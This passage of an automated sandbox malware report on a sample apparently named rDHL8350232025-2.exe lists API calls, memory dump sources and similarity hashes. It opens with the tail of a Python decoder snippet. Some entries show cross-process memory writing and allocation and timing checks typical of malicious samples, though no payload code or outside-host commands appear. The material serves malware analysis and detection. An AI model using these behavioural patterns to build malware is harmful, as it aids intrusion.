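        print(f"{api_id:60s} {', '.join(tags) or '-'}")
```

The decoder names a message only when the literal is present, because "?" means the report could not resolve the argument statically; the 0x1053, 0x1074 and 0x1002 values in the SendMessageW entry sit above WM_USER and are control-specific, so they are left as raw numbers. Subcall lines are kept on the record but excluded from the click rule, so a WM_LBUTTONUP posted from a callee does not pair with a WM_LBUTTONDOWN from the caller.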
APIs
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00049693
• SelectObject.GDI32(?,00000000), ref: 000496A2
• BeginPath.GDI32(?), ref: 000496B9
• SelectObject.GDI32(?,00000000), ref: 000496E2
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
• Opcode ID: d1a7c995cdfff8e943ee188c2380a5ba27dff0bda453fa35dafd300d94e2b35f
• Instruction ID: e16a095929775a27fdaccd210baab0ac4a4d435109c5ffdea00e793ae67c57ed
• Opcode Fuzzy Hash: d1a7c995cdfff8e943ee188c2380a5ba27dff0bda453fa35dafd300d94e2b35f
• Instruction Fuzzy Hash: 8A219570802305FFEB119F65EC08BAA3BA4BB55319F110235F894965B0D3B898D1CF98
APIs
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: _memcmp
• String ID:
• API String ID: 2931989736-0
• Opcode ID: 4410af872f52d8041adfaa6bb68bc273e4007a4508afbff9a865e48397a2a1a7
• Instruction ID: 59045a8c0af6f50605717675dcf73ee52064bf3a39f55bce1d81e4f8c1830622
• Opcode Fuzzy Hash: 4410af872f52d8041adfaa6bb68bc273e4007a4508afbff9a865e48397a2a1a7
• Instruction Fuzzy Hash: CF01D671245605BA9A195652BE92FFFA39D9B20396B004024FE049E242F7B0EF14A3A1
APIs
• GetLastError.KERNEL32(?,?,?,0005F2DE,00063863,00101444,?,0004FDF5,?,?,0003A976,00000010,00101440,000313FC,?,000313C6), ref: 00062DFD
• _free.LIBCMT ref: 00062E32
• _free.LIBCMT ref: 00062E59
• SetLastError.KERNEL32(00000000,00031129), ref: 00062E66
• SetLastError.KERNEL32(00000000,00031129), ref: 00062E6F
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: 6ccd3c7c14d3853c0a883e1bb5b0a454987bc60c4b685fc02a58ba8d9dce15d3
• Instruction ID: ea909cefce737d64908a6a13c55818d3e6d81e9b5755d353d147c489ac022432
• Opcode Fuzzy Hash: 6ccd3c7c14d3853c0a883e1bb5b0a454987bc60c4b685fc02a58ba8d9dce15d3
• Instruction Fuzzy Hash: 3D012836645E0167E72267747C46DAF269FEBD23B1B250038F425A32D3EF7A8C014170
APIs
• CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?,?,0009035E), ref: 0009002B
• ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?), ref: 00090046
• lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?), ref: 00090054
• CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?), ref: 00090064
• CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?), ref: 00090070
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: From$Prog$FreeStringTasklstrcmpi
• String ID:
• API String ID: 3897988419-0
• Opcode ID: 9831d8709aaa77137ec124fcd0ab1c35d52a8c679527b966efb261fb432bfc34
• Instruction ID: fd80ad919b9ee97255d77c4cb983b8d86fca87c96ad1d2ce2071c6857d4a19b0
• Opcode Fuzzy Hash: 9831d8709aaa77137ec124fcd0ab1c35d52a8c679527b966efb261fb432bfc34
• Instruction Fuzzy Hash: B4018F72600205BFEF108F68DC04FAE7AEDEB84751F144124F909D2210DB76DD44ABA0
APIs
• QueryPerformanceCounter.KERNEL32(?), ref: 0009E997
• QueryPerformanceFrequency.KERNEL32(?), ref: 0009E9A5
• Sleep.KERNEL32(00000000), ref: 0009E9AD
• QueryPerformanceCounter.KERNEL32(?), ref: 0009E9B7
• Sleep.KERNEL32 ref: 0009E9F3
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
• Opcode ID: 055f393a9abbec517a94ce8582e68a2a06fb648bec2c22745b9813252fc543b9
• Instruction ID: c2710bfbecb035797f76f9bce006e39e145eef5088fe881c377b2b908f2c9f10
• Opcode Fuzzy Hash: 055f393a9abbec517a94ce8582e68a2a06fb648bec2c22745b9813252fc543b9
• Instruction Fuzzy Hash: 8A015731C01669DBEF40EBE5DC59AEDBB78FB09700F050956E902B2241CB3899509BA1
APIs
• GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00091114
• GetLastError.KERNEL32(?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 00091120
• GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 0009112F
• HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 00091136
• GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0009114D
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: HeapObjectSecurityUser$AllocErrorLastProcess
• String ID:
• API String ID: 842720411-0
• Opcode ID: cc945112351372f665fb661deb96386264e48712c829480c3702112bf45a6b67
• Instruction ID: 2afe05695e78fd98d3b13492c723fee12919a15d39385e2cb964171c8ecddfbb
• Opcode Fuzzy Hash: cc945112351372f665fb661deb96386264e48712c829480c3702112bf45a6b67
• Instruction Fuzzy Hash: 4A013C75200205BFEB114FA5DC4DEAA3FAEEF8A3A0B244419FA49D7360DB35DD019B60
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00090FCA
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00090FD6
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00090FE5
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00090FEC
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00091002
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
• Opcode ID: 1989f2fbfb3d237e17a80981b64d7d6774081057b9be68582bb429ae3871c614
• Instruction ID: 9715cb5ae17d22662098d59513afed6d8777d2b58240e27d2f96fbe790ae82dd
• Opcode Fuzzy Hash: 1989f2fbfb3d237e17a80981b64d7d6774081057b9be68582bb429ae3871c614
• Instruction Fuzzy Hash: DCF04935200302ABEB214FA5EC49F963BADFF8A762F244414FE49C6251CA75DC50CA60
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0009102A
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00091036
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00091045
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0009104C
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00091062
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
• Opcode ID: d8e76a93a995ae9ee80786b060eb03362b273ecd270780062b3f2aaa6e3cb095
• Instruction ID: a9b36616ba3d63a1ab6571c1687a4c181b5b75a3211bad356a382dd964123cb5
• Opcode Fuzzy Hash: d8e76a93a995ae9ee80786b060eb03362b273ecd270780062b3f2aaa6e3cb095
• Instruction Fuzzy Hash: 1EF06D35200302EBFB215FA5EC49F963BADFF8A7A1F240414FE49C7250CA75D9508A60
APIs
• CloseHandle.KERNEL32(?,?,?,?,000A017D,?,000A32FC,?,00000001,00072592,?), ref: 000A0324
• CloseHandle.KERNEL32(?,?,?,?,000A017D,?,000A32FC,?,00000001,00072592,?), ref: 000A0331
• CloseHandle.KERNEL32(?,?,?,?,000A017D,?,000A32FC,?,00000001,00072592,?), ref: 000A033E
• CloseHandle.KERNEL32(?,?,?,?,000A017D,?,000A32FC,?,00000001,00072592,?), ref: 000A034B
• CloseHandle.KERNEL32(?,?,?,?,000A017D,?,000A32FC,?,00000001,00072592,?), ref: 000A0358
• CloseHandle.KERNEL32(?,?,?,?,000A017D,?,000A32FC,?,00000001,00072592,?), ref: 000A0365
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: a718a9dcb87a0a0d643ac899007d4e6488a35570ed70670730d2789fad512695
• Instruction ID: 9a2c29090ea236d730528d1b3bb72ad22ebd10bb307834cd5c0a2f0f84524784
• Opcode Fuzzy Hash: a718a9dcb87a0a0d643ac899007d4e6488a35570ed70670730d2789fad512695
• Instruction Fuzzy Hash: BE01AE72800B199FCB30AFA6D880812FBF9BF613153158A3FD19652931C3B1AA58DF80
APIs
• _free.LIBCMT ref: 0006D752
  • Part of subcall function 000629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000), ref: 000629DE
  • Part of subcall function 000629C8: GetLastError.KERNEL32(00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000,00000000), ref: 000629F0
• _free.LIBCMT ref: 0006D764
• _free.LIBCMT ref: 0006D776
• _free.LIBCMT ref: 0006D788
• _free.LIBCMT ref: 0006D79A
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: fc035b8bbcd68164667cc1b0fd7b53d4186bc9adff4bbb0fcff08d414e899edb
• Instruction ID: 442dbe1b57ebc2cab997533cd15784fe20133d5ad86001c5f15452473495e133
• Opcode Fuzzy Hash: fc035b8bbcd68164667cc1b0fd7b53d4186bc9adff4bbb0fcff08d414e899edb
• Instruction Fuzzy Hash: A2F03632B48608AB9665EB64FAC6C6A77DFBB44750B940C0AF048D7902DB34FC80D675
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00095C58
• GetWindowTextW.USER32(00000000,?,00000100), ref: 00095C6F
• MessageBeep.USER32(00000000), ref: 00095C87
• KillTimer.USER32(?,0000040A), ref: 00095CA3
• EndDialog.USER32(?,00000001), ref: 00095CBD
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• String ID:
• API String ID: 3741023627-0
• Opcode ID: d7042b1d29d19a277a90468198e90ed4de5d4b25cd87fc8a1e22e4ec2315a971
• Instruction ID: 68b5090b8fcbe92622c99bf0fc511a762244c68b25f6f8037231f53c7d8b98f0
• Opcode Fuzzy Hash: d7042b1d29d19a277a90468198e90ed4de5d4b25cd87fc8a1e22e4ec2315a971
• Instruction Fuzzy Hash: 9E013170500B04AFFF325B11DE4EFEA77B8BB04B06F041659E687A15E1DBF4A9849B90
APIs
• _free.LIBCMT ref: 000622BE
  • Part of subcall function 000629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000), ref: 000629DE
  • Part of subcall function 000629C8: GetLastError.KERNEL32(00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000,00000000), ref: 000629F0
• _free.LIBCMT ref: 000622D0
• _free.LIBCMT ref: 000622E3
• _free.LIBCMT ref: 000622F4
• _free.LIBCMT ref: 00062305
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 57fa046b1e474347aed3bc5983e93df5ce422be48d0c901228576a0027f73e50
• Instruction ID: 7da6be415a42971f37a670a793cef530dc7628d51cc55d76547205bb65f483ba
• Opcode Fuzzy Hash: 57fa046b1e474347aed3bc5983e93df5ce422be48d0c901228576a0027f73e50
• Instruction Fuzzy Hash: F8F05470500915ABD717AF54BC02D5C3BA6F718B91B10050AF450D2A72CBB80891FFF5
                                                                                      APIs
                                                                                      • EndPath.GDI32(?), ref: 000495D4
                                                                                      • StrokeAndFillPath.GDI32(?,?,000871F7,00000000,?,?,?), ref: 000495F0
                                                                                      • SelectObject.GDI32(?,00000000), ref: 00049603
                                                                                      • DeleteObject.GDI32 ref: 00049616
                                                                                      • StrokePath.GDI32(?), ref: 00049631
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                      • String ID:
                                                                                      • API String ID: 2625713937-0
                                                                                      • Opcode ID: e82cc5724931719ea44121ab506209affd4bec5c07b1e74fd6c3697d5fc8daf5
                                                                                      • Instruction ID: 4851afddf3048a438f32eab2f3990a28817a2ddf5efb82bbafb328c6ac5764c4
                                                                                      • Opcode Fuzzy Hash: e82cc5724931719ea44121ab506209affd4bec5c07b1e74fd6c3697d5fc8daf5
                                                                                      • Instruction Fuzzy Hash: 06F03C31005604EBEB265F65ED1CF653BA1BB09326F148224F4A9554F0C7B88991DF24
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: __freea$_free
                                                                                      • String ID: a/p$am/pm
                                                                                      • API String ID: 3432400110-3206640213
                                                                                      • Opcode ID: af90be36a4e1ac48e960faba878f62cee57cf8700a25d166e48b8b11e521748e
                                                                                      • Instruction ID: 0ace4c10c96b955b1b28b32b678f39c26b859a506bcd21b53c986151386ba351
                                                                                      • Opcode Fuzzy Hash: af90be36a4e1ac48e960faba878f62cee57cf8700a25d166e48b8b11e521748e
                                                                                      • Instruction Fuzzy Hash: 8FD10071900216DADB689F68C855BFEB7F3EF06300F2C4119E906ABB91D3759E81CB91
                                                                                      APIs
                                                                                        • Part of subcall function 00050242: EnterCriticalSection.KERNEL32(0010070C,00101884,?,?,0004198B,00102518,?,?,?,000312F9,00000000), ref: 0005024D
                                                                                        • Part of subcall function 00050242: LeaveCriticalSection.KERNEL32(0010070C,?,0004198B,00102518,?,?,?,000312F9,00000000), ref: 0005028A
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                        • Part of subcall function 000500A3: __onexit.LIBCMT ref: 000500A9
                                                                                      • __Init_thread_footer.LIBCMT ref: 000B7BFB
                                                                                        • Part of subcall function 000501F8: EnterCriticalSection.KERNEL32(0010070C,?,?,00048747,00102514), ref: 00050202
                                                                                        • Part of subcall function 000501F8: LeaveCriticalSection.KERNEL32(0010070C,?,00048747,00102514), ref: 00050235
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                      • String ID: 5$G$Variable must be of type 'Object'.
                                                                                      • API String ID: 535116098-3733170431
                                                                                      • Opcode ID: 66cbf4f27b8468bfda473a0bccb9feb03db9a9059dae426e2ecb59045bb01772
                                                                                      • Instruction ID: e64870ae6b3bf2ca43812df4ef96a333d66422d7c23ce38967bc1f5ab3d41669
                                                                                      • Opcode Fuzzy Hash: 66cbf4f27b8468bfda473a0bccb9feb03db9a9059dae426e2ecb59045bb01772
                                                                                      • Instruction Fuzzy Hash: F8917970A04209EFCB14EF94D891DEDBBB5EF89340F10805DF84AAB292DB71AE41CB51
                                                                                      APIs
                                                                                        • Part of subcall function 0009B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000921D0,?,?,00000034,00000800,?,00000034), ref: 0009B42D
                                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00092760
                                                                                        • Part of subcall function 0009B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000921FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0009B3F8
                                                                                        • Part of subcall function 0009B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0009B355
                                                                                        • Part of subcall function 0009B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00092194,00000034,?,?,00001004,00000000,00000000), ref: 0009B365
                                                                                        • Part of subcall function 0009B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00092194,00000034,?,?,00001004,00000000,00000000), ref: 0009B37B
                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000927CD
                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0009281A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                      • String ID: @
                                                                                      • API String ID: 4150878124-2766056989
                                                                                      • Opcode ID: a6cfc29172ba3719999d954735383a97a5f7ace10cd3aa0fc657e03f25553056
                                                                                      • Instruction ID: 66e4c8ac7fe0f92fb92e684bbb5319a726bc959b28b18c39a5c0319456f9602c
                                                                                      • Opcode Fuzzy Hash: a6cfc29172ba3719999d954735383a97a5f7ace10cd3aa0fc657e03f25553056
                                                                                      • Instruction Fuzzy Hash: 4E411972900218BFDF10DBA4DD85EEEBBB8AF09710F108099FA55B7181DB706E45DBA1
                                                                                      APIs
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\rDHL8350232025-2.exe,00000104), ref: 00061769
                                                                                      • _free.LIBCMT ref: 00061834
                                                                                      • _free.LIBCMT ref: 0006183E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
